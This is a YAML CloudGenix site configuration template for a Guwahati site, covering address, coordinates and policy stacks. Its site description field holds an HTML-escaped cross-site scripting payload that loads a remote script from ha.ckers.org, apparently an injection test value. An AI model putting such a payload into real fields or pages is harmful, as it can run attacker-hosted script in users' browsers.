---
type: cloudgenix template
version: 1.0
# Created at 2020-10-05T12:27:00.847334Z
# by system_2750@soumyars.com
sites v4.5:
  GUWAHATI_SITE:
    address:
      city: Guwahati
      country: India
      post_code:
      state:
      street:
      street2:
    admin_state: disabled
    description: '&lt;XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"&gt;'
    element_cluster_role: SPOKE
    elements v2.3: {}
    extended_tags:
    location:
      description:
      latitude: 26.15999984741211
      longitude: 91.7699966430664
    nat_policysetstack_id: Default-NATPolicySetStack
    network_policysetstack_id: NetworkPolicySetStack
    policy_set_id:
    priority_policysetstack_id: PriorityPolicySetStack
    security_policyset_id:
    service_binding: Preset Domain
    tags:
